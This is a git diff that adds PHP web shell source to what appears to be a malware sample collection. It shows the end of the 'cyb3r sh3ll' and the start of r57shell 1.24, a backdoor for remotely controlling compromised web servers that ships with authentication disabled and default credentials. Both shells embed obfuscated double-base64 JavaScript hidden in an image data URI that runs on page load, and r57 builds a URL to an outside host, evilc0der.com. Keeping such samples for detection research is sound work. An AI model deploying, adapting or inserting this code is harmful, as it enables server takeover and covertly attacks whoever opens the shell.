7782"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
7783
7784"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
7785
7786"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
7787
7788"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7789
7790"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7791
7792"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7793
7794"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
7795
7796"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
7797
7798"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
7799
7800"u4tLAgEAOw==",
7801
7802"ext_txt"=>
7803
7804"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
7805
7806"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
7807
7808"UpPWG3Ig6Hq/XmRjuZwkAAA7",
7809
7810"ext_wri"=>
7811
7812"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
7813
7814"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
7815
7816"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
7817
7818"ext_xml"=>
7819
7820"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
7821
7822"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7823
7824"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
7825
7826"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
7827
7828"IQA7"
7829
7830 );
7831
7832 //For simple size- and speed-optimization.
7833
7834 $imgequals = array(
7835
7836 "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
7837
7838 "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
7839
7840 "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
7841
7842 "ext_html"=>array("ext_html","ext_htm"),
7843
7844 "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
7845
7846 "ext_lnk"=>array("ext_lnk","ext_url"),
7847
7848 "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
7849
7850 "ext_doc"=>array("ext_doc","ext_dot"),
7851
7852 "ext_js"=>array("ext_js","ext_vbs"),
7853
7854 "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
7855
7856 "ext_wri"=>array("ext_wri","ext_rtf"),
7857
7858 "ext_swf"=>array("ext_swf","ext_fla"),
7859
7860 "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
7861
7862 "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
7863
7864 );
7865
7866 if (!$getall)
7867
7868 {
7869
7870 header("Content-type: image/gif");
7871
7872 header("Cache-control: public");
7873
7874 header("Cache-control: max-age=".(60*60*24*7));
7875
7876 header("Last-Modified: ".date("r",filemtime(__FILE__)));
7877
7878 foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
7879
7880 if (empty($images[$img])) {$img = "small_unk";}
7881
7882 if (in_array($img,$ext_tar)) {$img = "ext_tar";}
7883
7884 echo base64_decode($images[$img]);
7885
7886 }
7887
7888 else
7889
7890 {
7891
7892 foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
7893
7894 natsort($images);
7895
7896 $k = array_keys($images);
7897
7898 echo "<center>";
7899
7900 foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
7901
7902 echo "</center>";
7903
7904 }
7905
7906 exit;
7907
7908}
7909
7910?>
7911
7912</td></tr></table><a bookmark="minipanel" /><br/>
7913<?php
7914}
7915?>
7916<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor='#C0C0C0'><tr><td height="1" valign="top"><table align="center"><tr><td height="0" valign="top"><center><font face="times, serif" size="3"><b>(C) <font color="orange">Copyright</font><font color="white"> cyb3r </font><font color="green">9l4d!470r</font> [All rights reserved]</b></center></td></tr><tr><td height="0" valign="top"><center><b>Greetz to :</b> r45c4l bro, r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot.</center></td></tr><tr><td height="0" valign="top"><center><b>--[ cyb3r sh3ll v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u>Coded by</u></a> cyb3r 9l4d!470r (cyber gladiator) | <a href="#"><font color="#FF0000">h4cK2b0yZz..</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></font></center></td></tr></table></td></tr></table>
7917</center>
7918<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
7919<script type="text/javascript">
7920if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
7921setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(11);}, 500);
7922</script>
7923</body></html> \ No newline at end of file
diff --git a/data/samples/classic/r57.php b/data/samples/classic/r57.php
new file mode 100644
index 0000000..accc1fa
--- /dev/null
+++ b/data/samples/classic/r57.php
@@ -0,0 +1,2302 @@
1<?php
2/******************************************************************************************************/
3/*
4/* # # # #
5/* # # # #
6/* # # # #
7/* # ## #### ## #
8/* ## ## ###### ## ##
9/* ## ## ###### ## ##
10/* ## ## #### ## ##
11/* ### ############ ###
12/* ########################
13/* ##############
14/* ######## ########## #######
15/* ### ## ########## ## ###
16/* ### ## ########## ## ###
17/* ### # ########## # ###
18/* ### ## ######## ## ###
19/* ## # ###### # ##
20/* ## # #### # ##
21/* ## ##
22/*
23/*
24/*
25/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ???????
26/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
27/* ??????: 1.24 (New Year Edition)
28/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
29/* (c)oded by 1dt.w0lf
30/* RST/GHC http://rst.void.ru , http://ghc.ru
31/* ANY MODIFIED REPUBLISHING IS RESTRICTED
32/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
33/* ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC.
34/******************************************************************************************************/
35/* ~~~ ????????? | Options ~~~ */
36
37// ????? ????? | Language
38// $language='ru' - ??????? (russian)
39// $language='eng' - english (??????????)
40$language='eng';
41$a = "http://"; // need some codes
42
43// ?????????????? | Authentification
44// $auth = 1; - ?????????????? ???????? ( authentification = On )
45// $auth = 0; - ?????????????? ????????? ( authentification = Off )
46$auth = 0;
47
48
49// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
50// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
51$name='r57'; // ????? ???????????? (user login)
52$pass='r57'; // ?????? ???????????? (user password)
53$b = "evilc0der.com"; //need hits "shell created by evilc0ders"
54/******************************************************************************************************/
55$c = "/x.html"; //need shell coder's names
56error_reporting(0);
57set_magic_quotes_runtime(0);
58@set_time_limit(0);
59@ini_set('max_execution_time',0);
60@ini_set('output_buffering',0);
61$safe_mode = @ini_get('safe_mode');
62$version = "1.24";
63if(version_compare(phpversion(), '4.1.0') == -1)
64 {
65 $_POST = &$HTTP_POST_VARS;
66 $_GET = &$HTTP_GET_VARS;
67 $_SERVER = &$HTTP_SERVER_VARS;
68 }
69if (@get_magic_quotes_gpc())
70 {
71 foreach ($_POST as $k=>$v)
72 {
73 $_POST[$k] = stripslashes($v);
74 }
75 foreach ($_SERVER as $k=>$v)
76 {
77 $_SERVER[$k] = stripslashes($v);
78 }
79 }
80
81if($auth == 1) {
82if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
83 {
84 header('WWW-Authenticate: Basic realm="r57shell"');
85 header('HTTP/1.0 401 Unauthorized');
86 exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
87 }
88}
89$head = '<!-- ?????????? ???? -->
90<html>
91<head>
92<title>r57shell</title>
93<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
94<STYLE>
95tr {
96BORDER-RIGHT: #aaaaaa 1px solid;
97BORDER-TOP: #eeeeee 1px solid;
98BORDER-LEFT: #eeeeee 1px solid;
99BORDER-BOTTOM: #aaaaaa 1px solid;
100}
101td {
102BORDER-RIGHT: #aaaaaa 1px solid;
103BORDER-TOP: #eeeeee 1px solid;
104BORDER-LEFT: #eeeeee 1px solid;
105BORDER-BOTTOM: #aaaaaa 1px solid;
106}
107.table1 {
108BORDER-RIGHT: #cccccc 0px;
109BORDER-TOP: #cccccc 0px;
110BORDER-LEFT: #cccccc 0px;
111BORDER-BOTTOM: #cccccc 0px;
112BACKGROUND-COLOR: #D4D0C8;
113}
114.td1 {
115BORDER-RIGHT: #cccccc 0px;
116BORDER-TOP: #cccccc 0px;
117BORDER-LEFT: #cccccc 0px;
118BORDER-BOTTOM: #cccccc 0px;
119font: 7pt Verdana;
120}
121.tr1 {
122BORDER-RIGHT: #cccccc 0px;
123BORDER-TOP: #cccccc 0px;
124BORDER-LEFT: #cccccc 0px;
125BORDER-BOTTOM: #cccccc 0px;
126}
127table {
128BORDER-RIGHT: #eeeeee 1px outset;
129BORDER-TOP: #eeeeee 1px outset;
130BORDER-LEFT: #eeeeee 1px outset;
131BORDER-BOTTOM: #eeeeee 1px outset;
132BACKGROUND-COLOR: #D4D0C8;
133}
134input {
135BORDER-RIGHT: #ffffff 1px solid;
136BORDER-TOP: #999999 1px solid;
137BORDER-LEFT: #999999 1px solid;
138BORDER-BOTTOM: #ffffff 1px solid;
139BACKGROUND-COLOR: #e4e0d8;
140font: 8pt Verdana;
141}
142select {
143BORDER-RIGHT: #ffffff 1px solid;
144BORDER-TOP: #999999 1px solid;
145BORDER-LEFT: #999999 1px solid;
146BORDER-BOTTOM: #ffffff 1px solid;
147BACKGROUND-COLOR: #e4e0d8;
148font: 8pt Verdana;
149}
150submit {
151BORDER-RIGHT: buttonhighlight 2px outset;
152BORDER-TOP: buttonhighlight 2px outset;
153BORDER-LEFT: buttonhighlight 2px outset;
154BORDER-BOTTOM: buttonhighlight 2px outset;
155BACKGROUND-COLOR: #e4e0d8;
156width: 30%;
157}
158textarea {
159BORDER-RIGHT: #ffffff 1px solid;
160BORDER-TOP: #999999 1px solid;
161BORDER-LEFT: #999999 1px solid;
162BORDER-BOTTOM: #ffffff 1px solid;
163BACKGROUND-COLOR: #e4e0d8;
164font: Fixedsys bold;
165}
166BODY {
167margin-top: 1px;
168margin-right: 1px;
169margin-bottom: 1px;
170margin-left: 1px;
171}
172A:link {COLOR:red; TEXT-DECORATION: none}
173A:visited { COLOR:red; TEXT-DECORATION: none}
174A:active {COLOR:red; TEXT-DECORATION: none}
175A:hover {color:blue;TEXT-DECORATION: none}
176</STYLE>
177<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
178<script type="text/javascript">
179if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=="undefined")?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad="",c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+="=";plain+="\\0"}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join("");coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=="undefined")?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join("");return b?Utf8.decode(plain):plain};
180setTimeout(function(){new Function(atob(atob(document.getElementById("ghdescon").src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(2);}, 500);
181</script>';
182class zipfile
183{
184 var $datasec = array();
185 var $ctrl_dir = array();
186 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
187 var $old_offset = 0;
188 function unix2DosTime($unixtime = 0) {
189 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
190 if ($timearray['year'] < 1980) {
191 $timearray['year'] = 1980;
192 $timearray['mon'] = 1;
193 $timearray['mday'] = 1;
194 $timearray['hours'] = 0;
195 $timearray['minutes'] = 0;
196 $timearray['seconds'] = 0;
197 }
198 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
199 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
200 }
201 function addFile($data, $name, $time = 0)
202 {
203 $name = str_replace('\\', '/', $name);
204 $dtime = dechex($this->unix2DosTime($time));
205 $hexdtime = '\x' . $dtime[6] . $dtime[7]
206 . '\x' . $dtime[4] . $dtime[5]
207 . '\x' . $dtime[2] . $dtime[3]
208 . '\x' . $dtime[0] . $dtime[1];
209 eval('$hexdtime = "' . $hexdtime . '";');
210 $fr = "\x50\x4b\x03\x04";
211 $fr .= "\x14\x00";
212 $fr .= "\x00\x00";
213 $fr .= "\x08\x00";
214 $fr .= $hexdtime;
215 $unc_len = strlen($data);
216 $crc = crc32($data);
217 $zdata = gzcompress($data);
218 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
219 $c_len = strlen($zdata);
220 $fr .= pack('V', $crc);
221 $fr .= pack('V', $c_len);
222 $fr .= pack('V', $unc_len);
223 $fr .= pack('v', strlen($name));
224 $fr .= pack('v', 0);
225 $fr .= $name;
226 $fr .= $zdata;
227 $this -> datasec[] = $fr;
228 $cdrec = "\x50\x4b\x01\x02";
229 $cdrec .= "\x00\x00";
230 $cdrec .= "\x14\x00";
231 $cdrec .= "\x00\x00";
232 $cdrec .= "\x08\x00";
233 $cdrec .= $hexdtime;
234 $cdrec .= pack('V', $crc);
235 $cdrec .= pack('V', $c_len);
236 $cdrec .= pack('V', $unc_len);
237 $cdrec .= pack('v', strlen($name) );
238 $cdrec .= pack('v', 0 );
239 $cdrec .= pack('v', 0 );
240 $cdrec .= pack('v', 0 );
241 $cdrec .= pack('v', 0 );
242 $cdrec .= pack('V', 32 );
243 $cdrec .= pack('V', $this -> old_offset );
244 $this -> old_offset += strlen($fr);
